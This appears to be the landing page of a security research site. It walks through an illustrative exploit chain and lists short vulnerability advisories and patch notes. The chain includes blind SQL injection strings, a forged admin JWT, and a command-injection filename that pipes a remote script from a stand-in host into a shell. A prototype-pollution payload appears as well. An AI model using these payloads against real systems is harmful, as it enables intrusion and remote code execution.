[ LP/HOLE ] STATUS: LIVE_RECON
// security research division REF: CVE-2026-LP/HOLE-001

loophole.dev

we document the gaps. _

a security research platform for cataloging, reproducing, and weaponizing the loopholes the rest of the industry pretends do not exist. zero ceremony. receipts only.

// uptime 1187d : 04h : 22m
// advisories filed 1,294
// rooted last 30d 37
// public PoCs 812
root@loophole:~#
[ ENTRY-VECTOR ]
[ 0x00 // BREACH ]
offset:-3px // +3px
scroll ↓↓↓

the exploit chain

a real loophole is never a single bug. it is the dashed line connecting many small mistakes. follow the thread.

  1. 01
    LOW CWE-200

    Information Disclosure via Verbose Errors

    Stack traces returned in production responses leak internal package paths, framework versions, and database column names. Trivial on its own. Lethal as the first link.

    # GET /api/v1/orders/0
    500 Internal Server Error
    PostgresError: column "users.session_token"
      at /srv/app/node_modules/pg/lib/...
      build: 4.18.2-internal+canary
  2. 02
    MEDIUM CWE-89

    Boolean Blind Injection in Search Filter

    The leaked column name from step 01 is the same one a weakly sanitized search filter happily concatenates into a LIKE clause. Now we have a query oracle.

    ?q=' AND substring(session_token,1,1)='a
    → 200 OK   (truthy)
    ?q=' AND substring(session_token,1,1)='z
    → 200 OK   (falsy, but timing differs by 180ms)
  3. 03
    HIGH CWE-384

    Session Fixation via Reused JWT Secret

    The token we exfiltrated is signed with a secret reused across staging and production -- and staging is on a public preview URL. Forge any session you want.

    jwt.sign({sub: "admin", role: "root"},
             "REDACTED-staging-secret",
             { algorithm: "HS256" })
    => eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  4. 04
    CRITICAL CWE-78

    Admin RCE via "Export Report" Pipeline

    The forged admin role unlocks a report-export endpoint that shells out to pdftk with the filename unescaped. Game. Set. Match.

    POST /admin/reports/export
    { "filename": "report; curl lp.hole/x | sh #" }
    → remote shell on report-worker-prod-7
    → cluster-admin via overprivileged service token

advisories // raw feed

disclosed, in the wild, or sitting in a vendor inbox for too long. no marketing copy. just timestamps.

LP-2026-0411 OPEN

SSRF in webhook signature verifier

A popular billing SDK fetches the public key URL from the webhook header. A loop through 169.254.169.254 yields cloud-metadata creds within seconds.

severity: CRIT 9.4 vendor: undisclosed filed: 2026-04-29
LP-2026-0408 TRIAGE

Path traversal in "safe" archive extractor

Symlinks inside a tarball are dereferenced AFTER the sandbox check. Write-anywhere primitive on extract.

severity: HIGH 8.1 vendor: oss-archive-tools filed: 2026-04-22
LP-2026-0397 PENDING

Race in OAuth device-code polling

Two concurrent polls within a 12ms window can both claim the same code. Account takeover via collision.

severity: HIGH 7.6 vendor: identity-co filed: 2026-04-15
LP-2026-0388 COORDINATED

Prototype pollution in CLI option parser

--__proto__.isAdmin=true. Yes, in 2026. Yes, it shipped to a million build pipelines.

severity: MED 6.3 vendor: bigtool filed: 2026-03-30
LP-2026-0379 OPEN

Cache key confusion in CDN edge worker

Trailing whitespace in Host bypasses the normalizer. Poisoned response served to every tenant sharing that POP.

severity: CRIT 9.1 vendor: edge-net filed: 2026-03-21
LP-2026-0361 PENDING

Timing oracle in passkey assertion check

A non-constant-time compare on the user-handle byte leaks one nibble per attempt. Slow, but it ends in keys.

severity: MED 6.8 vendor: undisclosed filed: 2026-03-09
tty/loophole // raw feed
$ tail -f /var/log/loophole/feed
[ok] tailing feed -- ctrl-c to escape (you wont)

patch notes

what gets closed, eventually. the green stamp does not mean you are safe -- it means this specific edge is no longer ours.

  • LP-2026-0344 arbitrary file read in multipart parser closed by upstream v3.8.1 +27d
  • LP-2026-0339 SSRF via SVG <image href> mitigated, sandbox enforced +19d
  • LP-2026-0331 JWT none alg accepted on rotation endpoint -- now rejected +11d
  • LP-2026-0327 CSRF on tenant deletion behind double-submit + origin pin +44d
  • LP-2026-0319 XS-leak via fetch() redirect timing -- isolated by COOP/COEP +62d

disclosure policy — short version

90 days. extensions only when there is a real fix in flight. no NDAs. no hush money. PoCs published the day the patch ships unless lives are on the line.

— the loophole.dev research desk

// disclose research@loophole.dev
// pgp fp 9F1A 33C2 8E7B 4D55 0A2F
// signal +1 555 LOOP HOLE
// onion lp7holez4xq...onion